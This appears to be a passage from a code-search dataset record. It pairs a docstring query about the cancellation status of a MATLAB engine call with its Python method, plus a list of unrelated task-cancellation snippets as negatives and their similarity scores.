None\n timer.cancel()", "def stop(self):\r\n cfunc = lib_importer.windll.DAQmxStopTask\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [lib_importer.task_handle]\r\n\r\n error_code = cfunc(self._handle)\r\n check_for_error(error_code)", "def cancel(self) -> asyncio.Future:\n pass # pragma: no cover", "def evaluate():\n click.echo(\"Not implemented yet. 
In the future, this command will be used for evaluation.\")\n sys.exit(-2)", "def cancel(self):\n # type: () -> None\n if self.query_id is None or self.is_finished():\n return\n\n self._cancelled = True\n url = self._request.get_url(\"/v1/query/{}\".format(self.query_id))\n logger.debug(\"cancelling query: %s\", self.query_id)\n response = self._request.delete(url)\n logger.info(response)\n if response.status_code == requests.codes.no_content:\n logger.debug(\"query cancelled: %s\", self.query_id)\n return\n self._request.raise_response_error(response)", "def enableJobCancellation(cls) -> None:\n if platform.system() == \"Linux\":\n ddbcpp.sessionimpl.enableJobCancellation()\n else:\n raise RuntimeError(\"This method is only supported on Linux.\")", "def cancel(self):\n self.waiter.set_result_if_pending([])\n \n timer = self.timer\n if (timer is not None):\n self.timer = None\n timer.cancel()", "def cancel_all():\n\twhile _running:\n\t\t_running[0].cancel(noerror=True)", "async def module_command_cancel(self, ctx, parsed):\n waiting = []\n wait_id = None\n cancelled = False\n if parsed.args[\"list\"]:\n waiting = [pair[1] for pair in self._delayed_commands.values()]\n else:\n wait_id = parsed.args[\"id\"]\n try:\n cancelled = True\n task, waiting = self._delayed_commands[wait_id]\n task.cancel()\n except KeyError:\n pass\n await ctx.core_command_cancel(parsed, cancelled, wait_id, waiting)", "def test_cancel(self) -> None:\n context: Dict[str,ArtifactDescriptor] = dict()\n cmd = pycell.python_cell(\n source='import time\\ntime.sleep(5)',\n validate=True\n )\n controller = FakeWorkflowController()\n self.backend.execute_async(\n task=TaskHandle(\n task_id='000',\n project_id=self.PROJECT_ID,\n controller=controller\n ),\n command=cmd,\n artifacts=context\n )\n time.sleep(1)\n self.backend.cancel_task('000')\n time.sleep(5)\n self.assertIsNone(controller.task_id)\n self.assertIsNone(controller.state)", "def abort(self):\n try:\n self.acqRunning = False\n except:\n print('Cannot abort properly')", "def raise_for_failure(self) -> None:\n if not self.is_success():\n raise exc.ExecutionError(self)", "def abort() -> NoReturn:\n raise AbortSignal", "def rstrtmgr_RmCancelCurrentTask(jitter):\n ret_ad, args = jitter.func_args_stdcall([\"dwSessionHandle\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def stop_compilation_job(CompilationJobName=None):\n pass", "def provoke_and_handle_SyntaxError():\n try:\n eval(\"x === x\")\n except SyntaxError as se:\n print(f\"Sorry! 
You can't use eval in that way: {se}\")", "def action_cancel(self):\n ids = isinstance(self.ids, (int)) and [self.ids] or self.ids\n context = self._context or {}\n self.cancel_move()\n self.clear_wh_lines()\n return True", "def cancelled(self):\n return self._is_cancelled", "def cancel_analysis(request):\n cancel_flag[0] = True\n global currently_analyzing\n\n if not currently_analyzing:\n return HttpResponse(\n json.dumps({'error':\"error\"}),\n content_type=\"application/json\"\n )\n else:\n currently_analyzing = False\n return HttpResponse(\n json.dumps({'success':\"success\"}),\n content_type=\"application/json\"\n )", "def stopEvaluationMode(self):\r\n self.dataRef = self.storeDataRef", "def canceled(self):\n self.reject()", "def cancel_all(executions):\n for _, exec_node in executions:\n exec_node.cancel_all_instances()\n raise api.ExecutionCancelled()", "def cancel_inner():\n kernel32.SetEvent(cancel_event)", "def control_cancel(self, wait_for_ready: bool = True) -> None:\n self.__logger.debug('Eva.control_cancel called')\n return self.__http_client.control_cancel(wait_for_ready=wait_for_ready)", "def cancel_exec(\n self, \n project_id: str, \n branch_id: str\n ) -> Optional[List[ModuleHandle]]:\n with self.backend.lock:\n # Get the handle for the head workflow of the specified branch.\n branch = self.projects.get_branch(project_id=project_id, branch_id=branch_id)\n if branch is None:\n return None\n workflow = branch.get_head()\n if workflow is None:\n raise ValueError('empty workflow at branch head')\n # Set the state of all active modules to canceled\n first_active_module_index = None\n for i in range(len(workflow.modules)):\n module = workflow.modules[i]\n if module.is_active:\n module.set_canceled()\n if first_active_module_index is None:\n first_active_module_index = i\n # Cancel all running tasks for the project branch\n for task_id in list(self.tasks.keys()):\n task = self.tasks[task_id]\n if task.project_id == project_id and task.branch_id == branch_id:\n self.backend.cancel_task(task_id)\n del self.tasks[task_id]\n if not first_active_module_index is None:\n return workflow.modules[first_active_module_index:]\n else:\n return list()", "def no_evaluation(self, *args, **kwargs):\n\t\traise InvalidOperationError(\"Placeholders cannot be evaluated!\")", "def cancel(self):\n\n self.end()\n super().cancel()", "def _cancel_automation(self) -> None:\n if HANDLE_VACATION_MODE in self.handles:\n handle = self.handles.pop(HANDLE_VACATION_MODE)\n self.cancel_timer(handle)", "def stop(self):\n # raise NotImplementedError('Subclasses should provide a concrete implementation.')\n self._isRunnable = False", "def abortFunction(self,pcaId):\n #terminate Transition if active\n if self.isPCAinTransition[pcaId]:\n self.abort = True\n self.scriptProcess.terminate()\n else:\n self.transition(pcaId,QATransitions.abort)", "def abortFunction(self,pcaId):\n #terminate Transition if active\n if self.isPCAinTransition[pcaId]:\n self.abort = True\n self.scriptProcess.terminate()\n else:\n self.transition(pcaId,QATransitions.abort)" ]
[ "0.63782734", "0.6360038", "0.570138", "0.567854", "0.5647722", "0.5620772", "0.5620772", "0.5620772", "0.5620772", "0.5569046", "0.5432427", "0.53818804", "0.53624535", "0.5357489", "0.5344577", "0.53426117", "0.53072584", "0.5285678", "0.52575773", "0.52286595", "0.5207874", "0.5192892", "0.5187083", "0.51761293", "0.51707923", "0.5170652", "0.5147012", "0.5142183", "0.51373667", "0.51373667", "0.5133434", "0.5116128", "0.5116128", "0.5116128", "0.5116128", "0.5108862", "0.510463", "0.50978136", "0.5091435", "0.5081608", "0.5081608", "0.5079088", "0.5078481", "0.5068505", "0.5066932", "0.50498736", "0.5048644", "0.50452954", "0.5033014", "0.50116205", "0.5005408", "0.50013906", "0.50013906", "0.50013906", "0.4982583", "0.4979015", "0.49703228", "0.49688262", "0.49637666", "0.49575433", "0.4951338", "0.4940297", "0.4938504", "0.4934602", "0.49318507", "0.49276438", "0.49272916", "0.4923755", "0.49147978", "0.49142885", "0.49138373", "0.49088386", "0.4906266", "0.4904335", "0.48981196", "0.48941776", "0.4875052", "0.48749304", "0.48737228", "0.4873293", "0.48670912", "0.48618034", "0.48613897", "0.48552236", "0.4855133", "0.4854855", "0.485351", "0.4845831", "0.48434573", "0.48428002", "0.48404503", "0.4833994", "0.48285818", "0.48275807", "0.48238087", "0.48053062", "0.48026788", "0.48014528", "0.4795173", "0.4795173" ]
0.67627895
0
Obtain the cancellation status of the asynchronous execution of a MATLAB command. Returns bool: True if the execution is cancelled; False otherwise. Raises RejectedExecutionError: an error occurs if the engine is terminated.
def cancelled(self): self.__validate_engine() return pythonengine.isCancelledFEval(self._future)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cancel(self):\n self.__validate_engine()\n return pythonengine.cancelFEval(self._future)", "def cancelled(self):\n return self._status == Future.STATUS_CANCELED", "async def cancelled(self):\n await self._refresh_and_update()\n return (\n self._operation.HasField(\"error\")\n and self._operation.error.code == code_pb2.CANCELLED\n )", "def canceled(self):\n with self._done_condition:\n return self._state == CANCELLED", "def result(self, timeout=None): \n self.__validate_engine()\n \n if self._retrieved:\n return self._result\n\n \"\"\"\n Following code is used to poll the Ctrl+C every second from keyboard in\n order to cancel a MATLAB function.\n \"\"\"\n\n try:\n result_ready = self.wait(timeout, pythonengine.waitForFEval)\n\n if not result_ready:\n raise TimeoutError(pythonengine.getMessage('MatlabFunctionTimeout'))\n\n self._result = pythonengine.getFEvalResult(self._future,self._nargout, None, out=self._out, err=self._err)\n self._retrieved = True\n return self._result\n\n except KeyboardInterrupt:\n self.cancel()\n if self.cancelled():\n print(pythonengine.getMessage('MatlabFunctionCancelled'))\n except:\n raise", "async def test_cancel(\n decoy: Decoy,\n state_store: StateStore,\n command_executor: CommandExecutor,\n subject: QueueWorker,\n) -> None:\n subject.start()\n subject.cancel()\n\n await subject.join()\n\n decoy.verify(\n await command_executor.execute(command_id=matchers.Anything()),\n times=0,\n )", "def cancel(self):\n if not self.is_cancelled:\n self.will_change_value_for('is_cancelled')\n self.cancelled = True\n # remove our dependencies so that we're ready, properly behaved operations\n # will honor the cancel flag\n self.dependencies.clear()\n self.did_change_value_for('is_cancelled')\n \n if not self.is_executing and not self.is_finished:\n with self.changing('is_finished'):\n self.finished = True", "async def cancel(self):\n result = await self.done()\n if result:\n return False\n else:\n await self._cancel()\n return True", "def cancel(self):\n with self._done_condition:\n if self._state in [RUNNING, FINISHED]:\n return False\n if self._state == CANCELLED:\n return True\n self._state = CANCELLED\n self._done_condition.notify_all()\n self.__invoke_callbacks()\n return True", "def cancel(self):\n resp = self._api.cancel_task(self._job, self.id)\n\n if resp.success:\n return True\n\n if resp.result.type is None:\n # Call was successful but task was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "async def async_cancel(self):\n raise NotImplementedError", "def test_cancel(self):\n reactor = FakeReactor()\n cancelled = []\n\n def error(f):\n cancelled.append(reactor.in_call_from_thread)\n cancelled.append(f)\n\n d = Deferred().addErrback(error)\n dr = EventualResult(d, _reactor=reactor)\n dr.cancel()\n self.assertTrue(cancelled[0])\n self.assertIsInstance(cancelled[1].value, CancelledError)", "def rstrtmgr_RmCancelCurrentTask(jitter):\n ret_ad, args = jitter.func_args_stdcall([\"dwSessionHandle\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def execute(self, condition=None, timeout=90):\n if not self.stopped:\n if timeout:\n def timeout_func():\n try:\n raise Exception('Async operation timed out after {} seconds'.format(timeout))\n except:\n self.stop(failure=sys.exc_info())\n\n self.io_loop.add_timeout(time.time() + timeout, timeout_func)\n while True:\n self.running = True\n with NullContext():\n # Wipe out the StackContext that was established in\n # self.run() so that all callbacks 
executed inside the\n # IOLoop will re-run it.\n self.io_loop.start()\n if (self.failure is not None or\n condition is None or condition()):\n break\n assert self.stopped\n self.stopped = False\n if self.failure is not None:\n raise self.failure[0], self.failure[1], self.failure[2]\n result = self.return_value\n self.return_value = None\n return result", "async def cancel(self, uuid) -> bool:\n await self.session.close()\n # check task is active or cancelled\n\n if not self.task.done():\n \n __task = self.__toatal_downloads[uuid][\"task\"]\n __iscancel: bool = __task.cancel()\n\n return __iscancel\n else:\n return True", "def _thread_check_stop_event(self):\n self._require_controller_modes(['running_as_thread','running_as_blocking_call'])\n return self.thread.check_stop_event()", "async def module_command_cancel(self, ctx, parsed):\n waiting = []\n wait_id = None\n cancelled = False\n if parsed.args[\"list\"]:\n waiting = [pair[1] for pair in self._delayed_commands.values()]\n else:\n wait_id = parsed.args[\"id\"]\n try:\n cancelled = True\n task, waiting = self._delayed_commands[wait_id]\n task.cancel()\n except KeyError:\n pass\n await ctx.core_command_cancel(parsed, cancelled, wait_id, waiting)", "def cancel_dispatcher_process(self):\n if not self.celery_task_id:\n return\n canceled = []\n try:\n # Use control and reply mechanism to cancel and obtain confirmation\n timeout = 5\n canceled = ControlDispatcher('dispatcher', self.controller_node).cancel([self.celery_task_id])\n except socket.timeout:\n logger.error(f'could not reach dispatcher on {self.controller_node} within {timeout}s')\n except Exception:\n logger.exception(\"error encountered when checking task status\")\n return bool(self.celery_task_id in canceled) # True or False, whether confirmation was obtained", "def cancelled(self):\n return self._is_cancelled", "def cancel(self):\n self._log.debug(\"About to cancel job {0}\".format(self.id))\n resp = self._api.cancel(self.id)\n\n if resp.success:\n self.update()\n return True\n\n if resp.result.type is None:\n # Call was successful but job was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "async def _execute(self):\n f = os.popen(self._com)\n if self._exec_time > 0:\n await asyncio.sleep_ms(self._exec_time)\n try:\n r = f.read()\n print(r)\n if self._expected_return is not None:\n if r == self._expected_return:\n return True\n return r\n else:\n return r\n except Exception as e:\n raise e\n finally:\n f.close()", "def test_immediate_cancel(self):\n # This depends on the way reactor runs callFromThread calls, so need\n # real functional test.\n program = \"\"\"\\\nimport os, threading, signal, time, sys\n\nfrom twisted.internet.defer import Deferred, CancelledError\n\nimport crochet\ncrochet.setup()\n\[email protected]_in_reactor\ndef run():\n return Deferred()\n\ner = run()\ner.cancel()\ntry:\n er.wait(1)\nexcept CancelledError:\n sys.exit(23)\nelse:\n sys.exit(3)\n\"\"\"\n process = subprocess.Popen(\n [sys.executable, \"-c\", program],\n cwd=crochet_directory, )\n self.assertEqual(process.wait(), 23)", "def test_cancel(self) -> None:\n context: Dict[str,ArtifactDescriptor] = dict()\n cmd = pycell.python_cell(\n source='import time\\ntime.sleep(5)',\n validate=True\n )\n controller = FakeWorkflowController()\n self.backend.execute_async(\n task=TaskHandle(\n task_id='000',\n project_id=self.PROJECT_ID,\n controller=controller\n ),\n command=cmd,\n artifacts=context\n )\n time.sleep(1)\n self.backend.cancel_task('000')\n time.sleep(5)\n 
self.assertIsNone(controller.task_id)\n self.assertIsNone(controller.state)", "def is_cancelled(self):\n if \"isCancelled\" in self._prop_dict:\n return self._prop_dict[\"isCancelled\"]\n else:\n return None", "def cancel(self) -> bool:\n # Cancel analysis first since it is queued on jobs, then cancel jobs\n # otherwise there can be a race issue when analysis starts running\n # as soon as jobs are cancelled\n analysis_cancelled = self.cancel_analysis()\n jobs_cancelled = self.cancel_jobs()\n return analysis_cancelled and jobs_cancelled", "async def test_cancelled_task(self):\n await self.cog._unsilence(self.text_channel)\n self.cog.scheduler.cancel.assert_called_once_with(self.text_channel.id)", "def cancel_analysis(self, ids: Optional[Union[str, List[str]]] = None) -> bool:\n if isinstance(ids, str):\n ids = [ids]\n\n # Lock analysis futures so we can't add more while trying to cancel\n with self._analysis_futures.lock:\n all_cancelled = True\n not_running = []\n for cid, callback in reversed(self._analysis_callbacks.items()):\n if ids and cid not in ids:\n # Skip cancelling this callback\n continue\n\n # Set event to cancel callback\n callback.event.set()\n\n # Check for running callback that can't be cancelled\n if callback.status == AnalysisStatus.RUNNING:\n all_cancelled = False\n LOG.warning(\n \"Unable to cancel running analysis callback [Experiment ID: %s]\"\n \"[Analysis Callback ID: %s]\",\n self.experiment_id,\n cid,\n )\n else:\n not_running.append(cid)\n\n # Wait for completion of other futures cancelled via event.set\n waited = futures.wait([self._analysis_futures[cid] for cid in not_running], timeout=1)\n # Get futures that didn't raise exception\n for fut in waited.done:\n if fut.done() and not fut.exception():\n cid = fut.result()[0]\n if cid in self._analysis_futures:\n del self._analysis_futures[cid]\n\n return all_cancelled", "def enableJobCancellation(cls) -> None:\n if platform.system() == \"Linux\":\n ddbcpp.sessionimpl.enableJobCancellation()\n else:\n raise RuntimeError(\"This method is only supported on Linux.\")", "async def checkpoint_if_cancelled() -> None:\n await get_async_backend().checkpoint_if_cancelled()", "def cancelled(self):\n return self._state == AsyncPostRequest._CANCELLED", "def control_cancel(self, wait_for_ready: bool = True) -> None:\n self.__logger.debug('Eva.control_cancel called')\n return self.__http_client.control_cancel(wait_for_ready=wait_for_ready)", "async def wait_for_cancel(self):\n await self._cancel", "def can_cancel(self):\n # type () -> bool\n return self.cancelable", "def getEchoCanceller(self, channel, unitCode=0):\n res = self.XAPCommand(\"AEC\", channel, unitCode=unitCode)\n return bool(int(res))", "def cancel(self) -> asyncio.Future:\n pass # pragma: no cover", "def poll(self):\n if self._worker is None:\n self.returncode = None\n return self.returncode\n elif self._worker.is_alive():\n self.returncode = None\n return self.returncode\n else:\n self.returncode = self._worker.state.return_value\n return self.returncode", "def test_cancel_status_flag(self):\n\n arg_parser = arguments.get_parser()\n\n args = arg_parser.parse_args([\n 'run',\n '-H', 'this',\n 'cancel_test.test1'\n ])\n\n run_cmd = commands.get_command(args.command_name)\n run_cmd.silence()\n run_cmd.run(self.pav_cfg, args)\n\n args = arg_parser.parse_args([\n 'cancel',\n '-s'\n ])\n\n cancel_cmd = commands.get_command(args.command_name)\n cancel_cmd.silence()\n\n self.assertEqual(cancel_cmd.run(self.pav_cfg, args), 0)", "def stopAsync(self):\n return 
internals.blpapi_ProviderSession_stopAsync(self.__handle) == 0", "def cancel(self):\n resp = self.ph.conn.request(\n 'POST', self.ph.URLS['cancelrun'].format(self.run_token), dict(api_key=self.ph.api_key))\n data = resp.data.decode('utf-8')\n return json.loads(data)['run_token']", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def cancel(self):\n if self.cancelled() or self.done():\n return False\n self._is_done = True\n self._is_cancelled = True\n return True", "async def async_call(self, args=None, timeout=None):\n if args is None:\n args = []\n\n # Executing command with Tornado subprocess is possible only in main thread\n if threading.main_thread().ident != threading.get_ident():\n return self.call(args=args, timeout=timeout)\n\n all_args = [self.CMD if self.CMD is not None else cfg['tools.%s.cmd' % self.NAME]]\n all_args.extend(self.COMMON_ARGS)\n all_args.extend(args)\n cmd = ' '.join(all_args),\n log.debug('Executing: %s', cmd)\n\n if self._cancelled:\n raise Exception('Task was cancelled')\n task = process.Subprocess(all_args, stderr=process.Subprocess.STREAM, stdout=process.Subprocess.STREAM)\n self.proc = task.proc\n\n coroutine = gen.multi([task.wait_for_exit(raise_error=False),\n task.stdout.read_until_close(),\n task.stderr.read_until_close()])\n\n if not timeout:\n return_code, stdout, stderr = await coroutine\n else:\n try:\n return_code, stdout, stderr = await gen.with_timeout(timedelta(seconds=timeout), coroutine)\n except gen.TimeoutError as exception:\n log.exception(\"Command %s timed out after %s while executing %s\", self.NAME, timeout, cmd)\n task.proc.kill()\n raise exception\n\n self.proc = None\n\n if return_code != 0:\n log.warning(\"Command '%s' failed wit exit code: %s\", cmd, return_code)\n log.debug(\"Command '%s':\\nSTDOUT:\\n%s\\nSTDERR:\\n%s\", cmd, stdout, stderr)\n if self.RAISE_ERROR:\n raise subprocess.CalledProcessError(return_code, cmd)\n\n return self.parser.parse(stdout.decode('utf-8'), stderr.decode('utf-8'))", "def shellExecErrorCode(cmd):\n return subprocess.call(cmd, shell=True)", "def test_cancel(self):\n\n arg_parser = arguments.get_parser()\n\n args = arg_parser.parse_args([\n 'run',\n '-H', 'this',\n 'cancel_test'\n ])\n run_cmd = commands.get_command(args.command_name)\n run_cmd.silence()\n run_cmd.run(self.pav_cfg, args)\n\n args = arg_parser.parse_args([\n 'cancel'\n ])\n\n get_statuses(self.pav_cfg, args.tests)\n\n cancel_cmd = commands.get_command(args.command_name)\n cancel_cmd.silence()\n\n self.assertEqual(cancel_cmd.run(self.pav_cfg, args), 0)", "def executeCommand(commandtoexecute):\n try:\n _output = commands.getstatusoutput(commandtoexecute)\n except Exception as er:\n print \"not able to execute command\"\n return False\n return _output", "def _checkCommandStatus(self, lastCommand=False):\n p = self.spawnProc\n p.sendline('echo $?')\n regex = re.compile('^[0-9]+',re.M)\n p.expect(regex, 2)\n msg = '_checkCommandStatus : Execution of command FAILED'\n \tif lastCommand:\n \t msg = '_checkCommandStatus :Execution of command : \"%s\" FAILED' %lastCommand\n if p.after != '0' and p.after != '99':\n raise AssertionError(msg)", "def execute_task(self, filename):\n stdin, stdout, stderr = self.ssh.exec_command(open(filename).read())\n if stdout.channel.recv_exit_status() == 0:\n return True, stdout.read().strip(), stderr.read().strip()\n else:\n return False, stdout.read().strip(), stderr.read().strip()", "def iscanceled(*args):", 
"def get(self, retry_on_failure=True):\n done = threading.Event()\n\n api.cancel_callbacks.add(done.set)\n self.on_result(lambda _result: done.set())\n done.wait()\n api.cancel_callbacks.discard(done.set)\n\n if api.has_cancel_request():\n if self._result is self._NOT_SET:\n self.result = api.ExecutionCancelled()\n raise self.result\n\n ctx = self.task.workflow_context\n if not ctx.internal.graph_mode:\n ctx.internal.task_graph.remove_task(self.task)\n\n if self.task.get_state() in (TASK_FAILED, TASK_RESCHEDULED):\n handler_result = self.task.handle_task_terminated()\n if handler_result.retried_task and retry_on_failure:\n handler_result.retried_task.apply_async()\n return handler_result.retried_task.async_result.get()\n else:\n raise self.result\n return self._result", "def test_cancel(self):\n g = TaskDependencyGraph(MockWorkflowContext())\n task = mock.Mock()\n g.add_task(task)\n with mock.patch('cloudify.workflows.api.cancel_request', True):\n self.assertRaises(api.ExecutionCancelled, g.execute)\n\n self.assertFalse(task.apply_async.called)\n self.assertFalse(task.cancel.called)", "async def test_job_async_canceled(my_job_async):\n\n # Set up callback to get notifications when job state changes.\n job = None\n\n def on_job_update(_job):\n \"\"\"The callback to update `job`.\"\"\"\n nonlocal job\n job = _job\n\n if job.state in ['DONE', 'ERROR', 'WORKING']:\n canceled = my_job_async.job_manager_class.cancel(job.id)\n assert not canceled, (\n f'Uncancelable job is canceled in the `{job.state}` state!')\n\n my_job_async.set_on_update(on_job_update)\n\n # Submit a job that fails.\n await my_job_async.job(mustfail=True)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job_async.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'ERROR', f'Failed job has wrong state `{job.state}`!'\n\n # Submit a job that succeeds.\n await my_job_async.job(mustfail=False)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job_async.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'DONE', f'Finished job has wrong state `{job.state}`!'", "def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"cancel_operation\" not in self._stubs:\n self._stubs[\"cancel_operation\"] = self.grpc_channel.unary_unary(\n \"/google.longrunning.Operations/CancelOperation\",\n request_serializer=operations_pb2.CancelOperationRequest.SerializeToString,\n response_deserializer=None,\n )\n return self._stubs[\"cancel_operation\"]", "def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"cancel_operation\" not in self._stubs:\n self._stubs[\"cancel_operation\"] = self.grpc_channel.unary_unary(\n \"/google.longrunning.Operations/CancelOperation\",\n request_serializer=operations_pb2.CancelOperationRequest.SerializeToString,\n response_deserializer=None,\n )\n return self._stubs[\"cancel_operation\"]", "def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC 
handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"cancel_operation\" not in self._stubs:\n self._stubs[\"cancel_operation\"] = self.grpc_channel.unary_unary(\n \"/google.longrunning.Operations/CancelOperation\",\n request_serializer=operations_pb2.CancelOperationRequest.SerializeToString,\n response_deserializer=None,\n )\n return self._stubs[\"cancel_operation\"]", "def cancel(self):\n return self.RES_OK", "def query_abort(self) -> bool:\n return self._workers[threading.get_ident()].abort", "def getNoiseCancellation(self, channel, group, unitCode=0):\n resp = self.XAPCommand('NCSEL', channel, group, unitCode=unitCode)\n return bool(int(resp))", "def returncode(self) -> Optional[Union[int, str]]:\n return self.proc.poll() # type: ignore", "def stop(self):\r\n cfunc = lib_importer.windll.DAQmxStopTask\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [lib_importer.task_handle]\r\n\r\n error_code = cfunc(self._handle)\r\n check_for_error(error_code)", "async def cancel():\n await asyncio.get_running_loop().run_in_executor(None, cancel_inner)", "async def wait():\n try:\n await asyncio.get_running_loop().run_in_executor(None, wait_inner)\n except asyncio.CancelledError:\n await cancel()\n raise\n finally:\n kernel32.CloseHandle(timer)\n kernel32.CloseHandle(cancel_event)", "def _cancelCommands(self, reason):\n while self._current:\n cmd = self._current.pop(0)\n cmd.fail(reason)", "async def _wait_execute(self, address, command, args, kw):\n conn = await self.acquire(command, args)\n try:\n return (await conn.execute(command, *args, **kw))\n finally:\n self.release(conn)", "def is_terminated_properly(executor):\n return executor._broken or executor._shutdown_thread", "def is_canceled(self):\n\n if self.status == self.STATUS['CANCELED']:\n return True\n else:\n return False", "async def _condor_tool(\n resource_attributes: Tuple[AttributeDict, ...],\n executor: Executor,\n command: str,\n success_message: str,\n) -> Iterable[bool]:\n command = (\n command\n + \" \"\n + \" \".join(\n _job_id(resource.remote_resource_uuid) for resource in resource_attributes\n )\n )\n try:\n response = await executor.run_command(command)\n except CommandExecutionFailure as cef:\n # the tool fails if none of the jobs are found – because they all just shut down\n # report graceful failure for all\n if cef.exit_code == 1 and \"not found\" in cef.stderr:\n return [False] * len(resource_attributes)\n raise\n # successes are in stdout, failures in stderr, both in argument order\n # stdout: Job 15540.0 marked for removal\n # stderr: Job 15612.0 not found\n # stderr: Job 15535.0 marked for removal\n success_jobs = {\n TOOL_ID_PATTERN.search(line).group(1)\n for line in response.stdout.splitlines()\n if line.endswith(success_message)\n }\n return (\n _job_id(resource.remote_resource_uuid) in success_jobs\n for resource in resource_attributes\n )", "def isfailure(self):\n\n return self.proc.returncode != 0", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def is_cancelled(self):\n\n return self._state == \"CANCELLED\"", "def cancel_exec(\n self, \n project_id: str, \n branch_id: str\n ) -> Optional[List[ModuleHandle]]:\n with self.backend.lock:\n # Get the handle for the head workflow of the specified branch.\n branch = self.projects.get_branch(project_id=project_id, branch_id=branch_id)\n if branch is None:\n return None\n workflow = branch.get_head()\n if workflow 
is None:\n raise ValueError('empty workflow at branch head')\n # Set the state of all active modules to canceled\n first_active_module_index = None\n for i in range(len(workflow.modules)):\n module = workflow.modules[i]\n if module.is_active:\n module.set_canceled()\n if first_active_module_index is None:\n first_active_module_index = i\n # Cancel all running tasks for the project branch\n for task_id in list(self.tasks.keys()):\n task = self.tasks[task_id]\n if task.project_id == project_id and task.branch_id == branch_id:\n self.backend.cancel_task(task_id)\n del self.tasks[task_id]\n if not first_active_module_index is None:\n return workflow.modules[first_active_module_index:]\n else:\n return list()", "def _retrieve_result(self, out):\n try:\n result = self.parallel._backend.retrieve_result_callback(out)\n outcome = dict(status=TASK_DONE, result=result)\n except BaseException as e:\n # Avoid keeping references to parallel in the error.\n e.__traceback__ = None\n outcome = dict(result=e, status=TASK_ERROR)\n\n self._register_outcome(outcome)\n return outcome['status'] != TASK_ERROR", "def cancel(self):\n\n query = f\"scancel {self.jobid}\"\n if self.cluster:\n query = f\"scancel {self.jobid} --clusters={self.cluster}\"\n\n cmd = BuildTestCommand(query)\n cmd.execute()\n logger.debug(f\"Cancelling Job: {self.jobid} by running: {query}\")\n\n self.poll()\n self._state = \"CANCELLED\"", "def _check_job_status(self):\n try:\n status = self.ee2.check_job_canceled({\"job_id\": self.job_id})\n except Exception as e:\n self.logger.error(\n f\"Warning: Job cancel check failed due to {e}. However, the job will continue to run.\"\n )\n return True\n if status.get(\"finished\", False):\n return False\n return True", "def cancelled(self) -> bool:\n return self._cancelled is not None", "def isCancelled(self): #$NON-NLS-1$\r", "def cancel_work(self, message=\"This test was cancelled by lifeguard script because the test was interrupting progress (taking too long).\"):\n slick = SlickAsPy(self.environment.slickurl + \"/api\")\n status = slick.get_host_status(self.name)\n if status['currentWork'] is not None:\n slick.cancel_result(status['currentWork'], message)", "def _async_raise(self,tid, exctype):#强行终止进程方法\r\n tid = ctypes.c_long(tid)\r\n if not inspect.isclass(exctype):\r\n exctype = type(exctype)\r\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\r\n if res == 0:\r\n raise ValueError(\"invalid thread id\")\r\n elif res != 1:\r\n # \"\"\"if it returns a number greater than one, you're in trouble,\r\n # and you should call it again with exc=NULL to revert the effect\"\"\"\r\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\r\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")", "def _execute(self) -> Any:\n result = self.func(*self.args, **self.kwargs)\n if asyncio.iscoroutine(result):\n loop = asyncio.new_event_loop()\n coro_result = loop.run_until_complete(result)\n return coro_result\n return result", "def __try_command(cmd, description):\n try:\n out = subprocess.check_output(cmd, stderr=subprocess.STDOUT);\n return (True, out.decode(\"utf-8\")) # success\n except subprocess.CalledProcessError as e:\n print(\"Error while {:s}, return code is non-zero ({:d})\".format(description, e.returncode))\n print(\"Command: {:s}\".format(\" \".join(e.cmd)))\n if e.output:\n print(\"Output: {:s}\".format(e.output.decode(\"utf-8\").strip()))\n\n return (False, None) # error", "def disconnect(self):\n\t\treturn Job(SDK.PrlVmDev_Disconnect(self.handle)[0])", "def 
test_reactor_stop_unblocks_EventualResult_in_threadpool(self):\n program = \"\"\"\\\nimport os, threading, signal, time, sys\n\nfrom twisted.internet.defer import Deferred\nfrom twisted.internet import reactor\n\nimport crochet\ncrochet.setup()\n\[email protected]_in_reactor\ndef run():\n reactor.callLater(0.1, reactor.stop)\n return Deferred()\n\nresult = [13]\ndef inthread():\n er = run()\n try:\n er.wait(timeout=10)\n except crochet.ReactorStopped:\n result[0] = 23\nreactor.callInThread(inthread)\ntime.sleep(1)\nsys.exit(result[0])\n\"\"\"\n process = subprocess.Popen([sys.executable, \"-c\", program],\n cwd=crochet_directory)\n self.assertEqual(process.wait(), 23)", "def is_task_done(self):\r\n is_task_done = c_bool32()\r\n\r\n cfunc = lib_importer.windll.DAQmxIsTaskDone\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [\r\n lib_importer.task_handle, ctypes.POINTER(c_bool32)]\r\n\r\n error_code = cfunc(\r\n self._handle, ctypes.byref(is_task_done))\r\n check_for_error(error_code)\r\n\r\n return is_task_done.value", "def 